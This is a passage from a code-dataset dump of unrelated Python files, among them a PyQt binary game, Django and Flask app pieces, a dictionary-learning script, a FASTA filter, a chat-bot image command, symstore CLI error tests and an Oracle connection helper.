QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer8)\n answerDecInput8.show()\n answerDecInput4 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput4.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput4.setText(varInitialState)\n answerDecInput4.connect(answerDecInput4, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer4)\n answerDecInput4.show()\n answerDecInput2 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput2.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput2.setText(varInitialState)\n answerDecInput2.connect(answerDecInput2, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer2)\n answerDecInput2.show()\n 
answerDecInput1 = QtGui.QLineEdit(\"\", mainWindow)\n answerDecInput1.setAlignment(QtCore.Qt.AlignHCenter)\n answerDecInput1.setText(varInitialState)\n answerDecInput1.connect(answerDecInput1, QtCore.SIGNAL(\"textEdited(QString)\"),checkAnswer1)\n answerDecInput1.show()\n \"\"\"//Answer Input Holders\"\"\"\n \n \"\"\"Binary Answer Holders\"\"\"\n labelForBinaryanswerDecInput = QtGui.QLabel(\"Binary:\")\n labelForBinaryanswerDecInput.setAlignment(QtCore.Qt.AlignRight)\n labelForBinaryanswerDecInput.setMinimumSize(120,0)\n labelForBinaryanswerDecInput.show()\n answerBinaryInput128 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput128.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput128.setText(varInitialState)\n answerBinaryInput128.setReadOnly(True)\n answerBinaryInput128.show()\n answerBinaryInput64 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput64.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput64.setText(varInitialState)\n answerBinaryInput64.setReadOnly(True)\n answerBinaryInput64.show()\n answerBinaryInput32 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput32.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput32.setText(varInitialState)\n answerBinaryInput32.setReadOnly(True)\n answerBinaryInput32.show()\n answerBinaryInput16 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput16.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput16.setText(varInitialState)\n answerBinaryInput16.setReadOnly(True)\n answerBinaryInput16.show()\n answerBinaryInput8 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput8.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput8.setText(varInitialState)\n answerBinaryInput8.setReadOnly(True)\n answerBinaryInput8.show()\n answerBinaryInput4 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput4.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput4.setText(varInitialState)\n answerBinaryInput4.setReadOnly(True)\n answerBinaryInput4.show()\n answerBinaryInput2 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput2.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput2.setText(varInitialState)\n answerBinaryInput2.setReadOnly(True)\n answerBinaryInput2.show()\n answerBinaryInput1 = QtGui.QLineEdit(\"\", mainWindow)\n answerBinaryInput1.setAlignment(QtCore.Qt.AlignHCenter)\n answerBinaryInput1.setText(varInitialState)\n answerBinaryInput1.setReadOnly(True)\n answerBinaryInput1.show()\n \"\"\"//Binary Answer Holders\"\"\"\n \n \"\"\"Layout Horizontal\"\"\"\n buttonAidMatrixLayot = QtGui.QHBoxLayout()\n buttonAidMatrixLayot.addWidget(buttonHideShowMatrix)\n buttonAidMatrixLayot.addStretch(1)\n \n buttonNewNumberLayout = QtGui.QHBoxLayout()\n buttonNewNumberLayout.addWidget(newNumButton)\n buttonNewNumberLayout.addStretch(1)\n\n buttonLayoutBin = QtGui.QHBoxLayout() \n buttonLayoutBin.addWidget(labelForBinButtons) \n buttonLayoutBin.addWidget(buttonBin128)\n buttonLayoutBin.addWidget(buttonBin64)\n buttonLayoutBin.addWidget(buttonBin32)\n buttonLayoutBin.addWidget(buttonBin16)\n buttonLayoutBin.addWidget(buttonBin8)\n buttonLayoutBin.addWidget(buttonBin4)\n buttonLayoutBin.addWidget(buttonBin2)\n buttonLayoutBin.addWidget(buttonBin1)\n\n curNumLayout = QtGui.QHBoxLayout()\n curNumLayout.addWidget(labelForCurrentNumHolders)\n curNumLayout.addWidget(curNumHolder128)\n curNumLayout.addWidget(curNumHolder64)\n curNumLayout.addWidget(curNumHolder32)\n curNumLayout.addWidget(curNumHolder16)\n curNumLayout.addWidget(curNumHolder8)\n curNumLayout.addWidget(curNumHolder4)\n curNumLayout.addWidget(curNumHolder2)\n 
curNumLayout.addWidget(curNumHolder1)\n \n mainAidMatrixLayout = QtGui.QHBoxLayout()\n mainAidMatrixLayout.addWidget(labelForMainMatrix)\n mainAidMatrixLayout.addWidget(mainAidMatrix128)\n mainAidMatrixLayout.addWidget(mainAidMatrix64)\n mainAidMatrixLayout.addWidget(mainAidMatrix32)\n mainAidMatrixLayout.addWidget(mainAidMatrix16)\n mainAidMatrixLayout.addWidget(mainAidMatrix8)\n mainAidMatrixLayout.addWidget(mainAidMatrix4)\n mainAidMatrixLayout.addWidget(mainAidMatrix2)\n mainAidMatrixLayout.addWidget(mainAidMatrix1)\n \n secAidMatrixLayout = QtGui.QHBoxLayout()\n secAidMatrixLayout.addWidget(labelForSecMatrix)\n secAidMatrixLayout.addWidget(secAidMatrix128)\n secAidMatrixLayout.addWidget(secAidMatrix64)\n secAidMatrixLayout.addWidget(secAidMatrix32)\n secAidMatrixLayout.addWidget(secAidMatrix16)\n secAidMatrixLayout.addWidget(secAidMatrix8)\n secAidMatrixLayout.addWidget(secAidMatrix4)\n secAidMatrixLayout.addWidget(secAidMatrix2)\n secAidMatrixLayout.addWidget(secAidMatrix1)\n \n answerDecInputLayout = QtGui.QHBoxLayout()\n answerDecInputLayout.addWidget(labelForanswerDecInput)\n answerDecInputLayout.addWidget(answerDecInput128)\n answerDecInputLayout.addWidget(answerDecInput64)\n answerDecInputLayout.addWidget(answerDecInput32)\n answerDecInputLayout.addWidget(answerDecInput16)\n answerDecInputLayout.addWidget(answerDecInput8)\n answerDecInputLayout.addWidget(answerDecInput4)\n answerDecInputLayout.addWidget(answerDecInput2)\n answerDecInputLayout.addWidget(answerDecInput1)\n \n answerBinaryInputLayout = QtGui.QHBoxLayout()\n answerBinaryInputLayout.addWidget(labelForBinaryanswerDecInput)\n answerBinaryInputLayout.addWidget(answerBinaryInput128)\n answerBinaryInputLayout.addWidget(answerBinaryInput64)\n answerBinaryInputLayout.addWidget(answerBinaryInput32)\n answerBinaryInputLayout.addWidget(answerBinaryInput16)\n answerBinaryInputLayout.addWidget(answerBinaryInput8)\n answerBinaryInputLayout.addWidget(answerBinaryInput4)\n answerBinaryInputLayout.addWidget(answerBinaryInput2)\n answerBinaryInputLayout.addWidget(answerBinaryInput1)\n \"\"\"//Layout Horizontal\"\"\"\n \n \"\"\"Layout Vertical\"\"\"\n mainVerticalLayout = QtGui.QVBoxLayout()\n \"\"\"//Layout Vertical\"\"\"\n \n \"\"\"Add to Vertical Layout\"\"\"\n mainVerticalLayout.addLayout(buttonAidMatrixLayot)\n mainVerticalLayout.addLayout(buttonNewNumberLayout)\n mainVerticalLayout.addLayout(buttonLayoutBin)\n mainVerticalLayout.addLayout(answerBinaryInputLayout)\n mainVerticalLayout.addLayout(curNumLayout)\n mainVerticalLayout.addLayout(mainAidMatrixLayout)\n mainVerticalLayout.addLayout(secAidMatrixLayout)\n mainVerticalLayout.addLayout(answerDecInputLayout)\n \"\"\"//Add to Vertical Layout\"\"\"\n \n \"\"\"MainWindow Layout\"\"\"\n mainVerticalLayout.addStretch(1)\n mainWindow.setLayout(mainVerticalLayout)\n \"\"\"//MainWindow Layout\"\"\"\n \n sys.exit(binaryGame.exec_())\n \nmain()\n","sub_path":"NetworkBinaryGame.py","file_name":"NetworkBinaryGame.py","file_ext":"py","file_size_in_byte":31225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"648708098","text":"from django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.template.loader import render_to_string\n\nfrom .models import ViralVideo\n\n\n@receiver(post_save, sender=ViralVideo)\ndef inform_administrators(sender, **kwargs):\n from django.core.mail import mail_admins\n\n instance = kwargs[\"instance\"]\n created = kwargs[\"created\"]\n\n if created:\n context = {\"title\": 
instance.title, \"link\": instance.get_url()}\n subject = render_to_string(\n \"viral_videos/email/administrator/subject.txt\", context\n )\n plain_text_message = render_to_string(\n \"viral_videos/email/administrator/message.txt\", context\n )\n html_message = render_to_string(\n \"viral_videos/email/administrator/message.html\", context\n )\n\n mail_admins(\n subject=subject.strip(),\n message=plain_text_message,\n html_message=html_message,\n fail_silently=True,\n )\n","sub_path":"ch10/myproject_virtualenv/src/django-myproject/myproject/apps/viral_videos/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"79970756","text":"from flaskr.models import db\n\n\"\"\"\nQuestion\n\"\"\"\n\n\nclass Question(db.Model):\n __tablename__ = 'questions'\n\n id = db.Column(db.Integer, primary_key=True)\n question = db.Column(db.String, nullable=False)\n answer = db.Column(db.String, nullable=False)\n category_id = db.Column(\n db.Integer,\n db.ForeignKey('categories.id'),\n nullable=False)\n difficulty = db.Column(db.Integer, nullable=False)\n\n def __init__(self, question, answer, category_id, difficulty):\n self.question = question\n self.answer = answer\n self.category_id = category_id\n self.difficulty = difficulty\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'question': self.question,\n 'answer': self.answer,\n 'category_id': self.category_id,\n 'difficulty': self.difficulty\n }\n","sub_path":"projects/02_trivia_api/starter/backend/flaskr/models/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"54622985","text":"import Encryptor\nimport Decryptor\nimport SphereCryptor\nfrom Point import Point\nfrom Vector import Vector\nfrom appJar import gui\nimport pyperclip\n\n\n# encrypted = Encryptor.encrypt(\"hello\", 16)\n# print(encrypted)\n# decrypted = Decryptor.decrypt(encrypted)\n# print(decrypted)\n\n\n# handle button events\ndef press(button):\n text = app.getEntry(\"Text\")\n difficulty = app.getEntry(\"Difficulty\")\n if button == \"Encode\":\n encrypt = Encryptor.encrypt(text, int(difficulty))\n pyperclip.copy(encrypt)\n app.setMessage('Output', encrypt)\n else:\n decrypt = Decryptor.decrypt(text, int(difficulty))\n pyperclip.copy(decrypt)\n app.setMessage('Output', decrypt)\n\n\n# create a GUI variable called app\napp = gui(\"sphereCrypt\", \"650x400\")\napp.setBg(\"orange\")\napp.setFont(18)\n\n# add & configure widgets - widgets get a name, to help referencing them later\napp.addLabel(\"title\", \"Welcome to sphereCrypt\")\napp.setLabelBg(\"title\", \"blue\")\napp.setLabelFg(\"title\", \"orange\")\n\napp.addLabelEntry(\"Text\")\napp.addLabelEntry(\"Difficulty\")\napp.addMessage(\"Info\", 'Difficulty is any number between two and sixteen. 
Additionally, '\n 'The output of the encryption / decryption is automatically copied to your clipboard, '\n 'so in order to access the messages just CTRL-V on any text line')\napp.setMessageWidth(\"Info\", 650)\napp.addEmptyMessage('Output')\napp.setMessageWidth('Output', 650)\n\n# link the buttons to the function called press\napp.addButtons([\"Encode\", \"Decode\"], press)\n\napp.setFocus(\"Text\")\n\n# start the GUI\napp.go()\n","sub_path":"dist/__init__.app/Contents/Resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"243488940","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n#DL.py\n\n##This program builds a combined matrix from a given brain activity matrix and semantic representation matrix, taking the time lag into account,\n##then runs dictionary learning and saves the dictionary and the coefficients.\n##Command-line arguments\n##1.VB/TV 2.subject name 3.prediction accuracy threshold 4.number of bases 5.time lag 6.decimation rate (take one frame every N samples)\n\nimport sys\nimport pickle\nimport time\nimport os\nimport numpy as np\nfrom sklearn.decomposition import MiniBatchDictionaryLearning\nfrom sklearn.decomposition import DictionaryLearning\nfrom sklearn.decomposition import SparseCoder\n\n# path to the data directory\nDATA_DIR = \"../../data\"\n\ndef get_time_shift_data(brain_data, semantic_data, target, sub, shift):\n\n\t\"\"\"\n\tbrain_data: brain activity matrix\n\tsemantic_data: semantic representation matrix\n\ttarget: VB/TV\n\tsub: subject name\n\tshift: shift in seconds\n\t\t\n\tShifts the brain activity matrix and the semantic representation matrix relative to each other, accounting for the delay before stimuli are reflected in brain activity, and returns both\n\t\"\"\"\n\t#return the semantic representation adjusted for the time lag\n\tif target == 'VB': #VB has 9000 samples\n\t\tif sub != 'DK': #subjects ST and SN have one sample every 2 seconds\n\t\t\tstart = int(shift/2)\n\t\t\tend = int(4500-shift/2)\n\t\t\tbrain_data = brain_data[start:]\n\t\t\tsemantic_data = semantic_data[::2]\n\t\t\tsemantic_data = semantic_data[0:end]\n\t\telse:\n\t\t\tstart = int(shift)\n\t\t\tend = int(9000-shift)\n\t\t\tbrain_data = brain_data[start:]\n\t\t\tsemantic_data = semantic_data[0:end]\n\telse: #TV has 7200 samples\n\t\tstart = int(shift)\n\t\tend = int(7200-shift)\n\t\tbrain_data = brain_data[start:]\n\t\tsemantic_data = semantic_data[0:end]\n\n\treturn brain_data, semantic_data\n\ndef main():\n\n\tstart = time.time()\n\n\targs = sys.argv\n\ttarget = args[1]\n\tsub = args[2]\n\tthreshold = args[3]\n\tdimention = int(args[4])\n\tshift = int(args[5])\n\tsample = int(args[6])\n\n\tprint('target : {}'.format(target))\n\tprint('subject : {}'.format(sub))\n\n\n\tprint('{} sec shift'.format(shift))\n\n\t#load the brain activity data\n\twith open( DATA_DIR + '/Brain/' + target + '/' + sub + '_train_reduced_' + threshold +'.pickle', 'rb') as f:\n\t\tbrain_data = pickle.load(f)\n\n\t#load the semantic representation data\n\twith open( DATA_DIR + '/srm/' + target + '_srm300_train.pickle', 'rb') as f:\n\t\tsemantic_data = pickle.load(f)\n\n\t#get the time-shifted matrices\n\tbrain_data, semantic_data = get_time_shift_data(brain_data, semantic_data, target, sub, shift)\n\n\t\n\tprint('brain sample : {}'.format(len(brain_data)))\n\tprint('semantic_data : {}'.format(len(semantic_data)))\n\n\t#create the combined matrix by concatenating the two\n\tbrainw2vdata = np.c_[brain_data, semantic_data]\n\tbrainw2vdata = np.array(brainw2vdata)\n\n\tbrainw2vdata = brainw2vdata[::sample]\n\n\tprint(\"dimensions:\")\n\tprint(brainw2vdata.shape)\n\n\t#dictionary learning\n\tdict_model = DictionaryLearning(n_components = dimention, alpha = 1.0, transform_algorithm = 'lasso_lars', transform_alpha = 1.0, fit_algorithm = 'lars', verbose = True)\n\tdict_model.fit(brainw2vdata)\n\n\t#dictionary\n\tDict = dict_model.components_\n\tprint(\"dictionary:\")\n\tprint(Dict.shape)\n\n\t#coefficients \n\tcoef = dict_model.transform(brainw2vdata)\n\tprint(\"coefficients:\")\n\tprint(coef.shape)\n\n\t#save the dictionary\n\tf = open( DATA_DIR + \"/Dict/\" + target + 
\"/Dict_\" + sub + \"_pred\" + threshold + \"_base\" + str(dimention) + \"_sec\" + str(shift) + \"_sample\" + str(sample) + \".pickle\", \"wb\")\n\tpickle.dump(Dict, f)\n\tf.close()\n\n\t#係数保存\n\tf = open( DATA_DIR + \"/Dict/\" + target + \"/Coef_\" + sub + \"_pred\" + threshold + \"_base\" + str(dimention) + \"_sec\" + str(shift) + \"_sample\" + str(sample) + \".pickle\", \"wb\")\n\tpickle.dump(coef, f)\n\tf.close()\n\n\t#計算時間出力\n\telapsed_time = time.time() - start\n\tprint ((\"elapsed_time:{0}\".format(elapsed_time)) + \"[sec]\")\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"src/model/DL.py","file_name":"DL.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"108988862","text":"from django.conf.urls import url,include\nfrom . import views\n\n# for mysite/urls.py keep clean.\n\nurlpatterns = [\n # when someone visit myblog with url pattern like '^$',\n # server maybe shows views.post_list. remember\n url(r'^post/$', views.post_list, name='post_list'),\n url(r'^signup/$', views.signup,name='signup'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P[0-9]+)/$',views.post_detail, name='post_detail'),\n url(r'^post/(?P[0-9]+)/confirm/$',views.confirm, name='confirm'),\n url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name='post_edit'),\n url(r'^post/(?P\\d+)/remove/$', views.post_remove, name='post_remove'),\n url(r'^post/(?P\\d+)/comment/$',views.add_comment_to_post, name ='add_comment_to_post'),\n\turl(r'^study/$', views.study,name='study'),\n\turl(r'^home/$', views.home, name='home'),\n\turl(r'', views.home, name='home'),\n\turl('',include('social.apps.django_app.urls',namespace='social')),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280731510","text":"# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom .utils import WorkerActor\n\n\nclass CustomLogFetchActor(WorkerActor):\n def __init__(self):\n super().__init__()\n self._dispatch_ref = None\n\n def post_create(self):\n from .dispatcher import DispatchActor\n\n self._dispatch_ref = self.ctx.actor_ref(DispatchActor.default_uid())\n self._dispatch_ref.register_free_slot(self.uid, 'custom_log')\n\n def fetch_logs(self, log_paths, offsets, sizes):\n result = []\n for i, log_path in enumerate(log_paths):\n log_result = dict()\n\n offset = offsets[i]\n size = sizes[i]\n\n with self.ctx.fileobject(log_path, mode='r') as f:\n if offset < 0:\n # process negative offset\n offset = max(os.path.getsize(log_path) + offset, 0)\n\n if offset:\n f.seek(offset)\n\n log_result['log'] = f.read(size)\n log_result['offset'] = f.tell()\n\n result.append(log_result)\n\n return 
result\n","sub_path":"mars/worker/custom_log.py","file_name":"custom_log.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"428210059","text":"from __future__ import print_function\nimport sys\nimport urllib2\n# import os\nfrom bs4 import BeautifulSoup\n\n\nclass URLtoHTML:\n\t'''\n\tConverts given URL to text output. \n\n\t'''\n\n\tdef __init__(self, url):\n\t\t''' (URLtoText, str) -> NoneType\n\t\t'''\n\n\t\tself.url = url\n\n\tdef convert_only_tables(self):\n\t\t''' (URLtoText) -> str\n\t\t'''\n\n\t\tself.response = urllib2.urlopen(self.url)\n\t\tself.html = self.response.read()\n\t\tself.soup = BeautifulSoup(self.html)\n\t\treturn self.soup\n\n\tdef extract_from_table(self, converted_text):\n\t\t''' (URLtoText, BeautifulSoup) -> NoneType\n\t\t'''\n\n\t\tsecond_table = []\n\t\tjust_text = str(converted_text)\n\t\tfirst_table = just_text.split('')\n\t\tfor item in first_table:\n\t\t\tsecond_table.append(item.strip('\\n'))\n\t\tstring_table_HTML = ' '.join(second_table)\n\t\treturn string_table_HTML\n\n\tdef join_tables(self, final_table):\n\t\t''' (URLtoText) -> str\n\t\t'''\n\n\t\ttable_into_string = ' '.join(final_table)\n\t\tfinal_string = table_into_string.strip('\\n')\n\t\treturn final_string \n\n\nclass HTMLtoText:\n\n\tdef __init__(self, HTML_string):\n\t\t'''\n\t\t'''\n\n\t\tself.HTML_string = HTML_string\n\n\tdef convert_to_text(self):\n\t\t'''\n\t\t'''\n\n\t\tself.soup = BeautifulSoup(self.HTML_string)\n\t\tjust_text = self.soup.get_text()\n\t\treturn just_text\n\n\n\nif __name__ == '__main__':\n\tu = URLtoHTML(sys.argv[1])\n\t# only_table_tags = SoupStrainer('') # find only tables\n\tconverted_text = u.convert_only_tables()\n\tfinal_tables = u.extract_from_table(converted_text)\n\th = HTMLtoText(final_tables)\n\toutput = h.convert_to_text()\n\n\twith open('tmp.txt', 'w') as file:\n\t\tfile.write(output)\n\n\t# os.system(\"python process.py tmp.txt\")\n","sub_path":"processing/webprocess.py","file_name":"webprocess.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"579202153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 11:56:59 2016\nparses a fasta file by a list to include or exlude. Works with both single and\ncharacter break lines.\nusage: python fasta_parse.py -i [default exclude] FOO.INfasta FOO.OUTfasta\nFOO.headerlist\n\n@author: stsmall\n\"\"\"\n\nfrom itertools import groupby\nimport argparse\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='selects headers and'\n 'sequeces from fasta file')\n parser.add_argument('-i', '--include', action='store_true',\n help='this option excludes the header list')\n parser.add_argument('INfasta_file', metavar=\"INfasta\", type=str,\n help='path to fasta IN file')\n parser.add_argument('OUTfasta_file', metavar=\"OUTfasta\", type=str,\n help='path to fasta OUT file')\n parser.add_argument('header_list', metavar=\"header\", type=str,\n help='path to fasta OUT file')\n args = parser.parse_args()\n return(args)\n\n\ndef fasta_iter(fasta_IN_name):\n \"\"\"\n given a fasta file. 
yield tuples of header, sequence\n    \"\"\"\n    fh = open(fasta_IN_name)\n    # ditch the boolean (x[0]) and just keep the header or sequence since\n    # we know they alternate.\n    faiter = (x[1] for x in groupby(fh, lambda line: line[0] == \">\"))\n    for header in faiter:\n        # drop the \">\"\n        header = header.next()[1:].strip()\n        # join all sequence lines to one.\n        seq = \"\".join(s.strip() for s in faiter.next())\n        yield header, seq\n\n\ndef make_headerlist(header_clude):\n    header_parse = []\n    with open(header_clude) as header:\n        for line in header:\n            header_parse.append(line.split()[0])\n            # if line.startswith(\">\"):\n    return(header_parse)\n\n\nif __name__ == '__main__':\n    args = get_args()\n    f = open(args.OUTfasta_file, 'w')\n    header_parse = make_headerlist(args.header_list)\n    if args.include:\n        for header in fasta_iter(args.INfasta_file):\n            if header[0] in header_parse:\n                f.write(\">%s\\n%s\\n\" % (header[0], header[1]))\n    else:\n        for header in fasta_iter(args.INfasta_file):\n            if header[0] not in header_parse:\n                f.write(\">%s\\n%s\\n\" % (header[0], header[1]))\n    f.close()\n","sub_path":"fasta_tools/fasta_parse.py","file_name":"fasta_parse.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"213434604","text":"from zzcore import StdAns, mysakuya\nimport requests\n\nfrom config import LOLIKEY\n\nclass Ans(StdAns):\n    AllowGroup = [ 805197917,343700338,125733077,1084566280,920863253,798595664,655057127,196268763, 204097403, 247022495, 474907856]\n    def GETMSG(self):\n        url = 'https://api.lolicon.app/setu/'\n        params = {\n            'apikey': LOLIKEY,\n        }\n\n        if len(self.parms) < 2: \n            try:\n                resp = requests.get(url=url,params=params).json()\n                quota = str(resp['quota'])\n                seconds = resp['quota_min_ttl']\n                m, s = divmod(seconds, 60)\n                h, m = divmod(m, 60)\n                quota_min_ttl = f'{h}时{m}分{s}秒'\n                picurl = resp['data'][0]['url']\n                msg = f\"[CQ:reply,id={self.raw_msg['message_id']}][CQ:image,file={picurl}]\\n剩余次数 {quota}\\n距离回复元气 {quota_min_ttl}\"\n            except Exception as e:\n                print(e)\n                msg = '什么东西坏掉了,大概是Pixiv吧...不可能是咱!'\n            return msg\n\n        else:\n            keyword = self.parms[1]\n            if mysakuya(self, keyword) == False:\n                return \"不许你们看咲夜的涩图!!\"\n            \n            params['keyword'] = keyword\n            try:\n                resp = requests.get(url=url,params=params).json()\n                picurl = resp['data'][0]['url']\n                msg = '[CQ:reply,id=' + str(self.raw_msg['message_id']) + ']' + '咱帮你🔍 ' + keyword + ' 找到了这个\\n' + picurl\n\n                if len(self.parms) > 2 and self.parms[2] == 'p' :\n                    msg = '[CQ:image,file=' + picurl + ']'\n                # .replace('https://i.pixiv.cat', 'https://pximg.sihuan.workers.dev')\n                # msg = picurl.replace('https://i.pixiv.cat', 'https://original.img.cheerfun.dev')\n            except Exception as e:\n                print(e)\n                msg = '[CQ:reply,id=' + str(self.raw_msg['message_id']) + ']咱没查到 ' + keyword + ' 也有可能是Pixiv坏掉了'\n            return msg\n","sub_path":"worker/lsp.py","file_name":"lsp.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"99628738","text":"from os import path\nfrom tests.cli import util\nfrom tests import testcase\n\nSYMSTORE_PATH = \"dummy\"\n\n\nclass TestInvalidPEFile(testcase.TestCase):\n    def assertInvalidPEMsg(self, retcode, msg, type, filename):\n        self.assertEqual(retcode, 1)\n        self.assertRegex(msg.decode(),\n                         \".*%s: invalid %s file:.*\\n\" %\n                         (filename, type), \"unexpected error message\")\n\n    def test_empty_exe(self):\n        \"\"\"\n        will hit 'reading beyond end of file' error\n        \"\"\"\n        retcode, stderr = 
util.run_script(SYMSTORE_PATH, [\"empty.exe\"])\n        self.assertInvalidPEMsg(retcode, stderr, \"PE\", \"empty.exe\")\n\n    def test_invalid_exe(self):\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [\"invalid.exe\"])\n        self.assertInvalidPEMsg(retcode, stderr, \"PE\", \"invalid.exe\")\n\n    def test_invalid_pdb(self):\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [\"invalid.pdb\"])\n        self.assertInvalidPEMsg(retcode, stderr, \"PDB\", \"invalid.pdb\")\n\n\nclass TestTransactionNotFound(util.CliTester):\n    initial_dir_zip = \"existing_store.zip\"\n\n    def test_del_unknown_transaction(self):\n        \"\"\"\n        test deleting non-existing transaction\n        \"\"\"\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [],\n                                          [\"--delete\", \"0000000042\"])\n        self.assertEqual(retcode, 1)\n        self.assertRegex(stderr.decode(),\n                         \"no transaction with id '0000000042' found\")\n\n\nclass TestUnknownExtension(testcase.TestCase):\n    def assertErrorMsg(self, retcode, stderr, filename, msg):\n        self.assertEqual(retcode, 1)\n        self.assertRegex(stderr.decode(),\n                         \".*%s: %s, can't figure out file format%s\" %\n                         (filename, msg, util.line_end()),\n                         \"unexpected error message\")\n\n    def test_no_extension(self):\n        filename = \"no_extension\"\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [filename])\n        self.assertErrorMsg(retcode, stderr, filename,\n                            \"no file extension\")\n\n    def test_unknown_extension(self):\n        filename = \"unknown.ext\"\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [filename])\n        self.assertErrorMsg(retcode, stderr, filename,\n                            \"unknown file extension 'ext'\")\n\n\nclass TestFileNotFound(testcase.TestCase):\n    PDB_FILE = \"noexist.pdb\"\n    PE_FILE = \"noexist.exe\"\n\n    def test_pdb_not_found(self):\n        # full path to our non-existing file\n        pdb_path = path.join(util.SYMFILES_DIR, self.PDB_FILE)\n        # make sure the file doesn't exist\n        self.assertFalse(path.exists(pdb_path))\n\n        # run the script, and check that we get proper error message\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [self.PDB_FILE])\n        self.assertEqual(retcode, 1)\n        self.assertRegex(stderr.decode(), \"No such file: %s\" % pdb_path)\n\n    def test_pe_not_found(self):\n        # full path to our non-existing file\n        exe_path = path.join(util.SYMFILES_DIR, self.PE_FILE)\n        # make sure the file doesn't exist\n        self.assertFalse(path.exists(exe_path))\n\n        # run the script, and check that we get proper error message\n        retcode, stderr = util.run_script(SYMSTORE_PATH, [self.PE_FILE])\n        self.assertEqual(retcode, 1)\n        self.assertRegex(stderr.decode(), \"No such file: %s\" % exe_path)\n","sub_path":"tests/cli/test_errs.py","file_name":"test_errs.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237190419","text":"import cx_Oracle\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nimport onccfg\n\n\ndef oracle_conn():\n    user = onccfg.username\n    password = onccfg.password\n    sid = cx_Oracle.makedsn(onccfg.host, onccfg.port, sid=onccfg.sid)  # host, port, sid\n    cstr = f\"oracle://{user}:{password}@{sid}\"\n    engine = create_engine(cstr, convert_unicode=False, pool_recycle=10, pool_size=50, echo=False)\n    return engine\n\n\ndef read_sql(filename):\n    engine = oracle_conn()\n    sql_file = open(filename, \"r\")\n    query = sql_file.read()\n    sql_file.close()\n    df_from_sql = pd.DataFrame(pd.read_sql_query(query, engine))\n    df_from_sql.columns = map(str.upper, df_from_sql.columns)\n    return df_from_sql\n\n\ndef data_prep(source_data):\n    df = source_data\n    
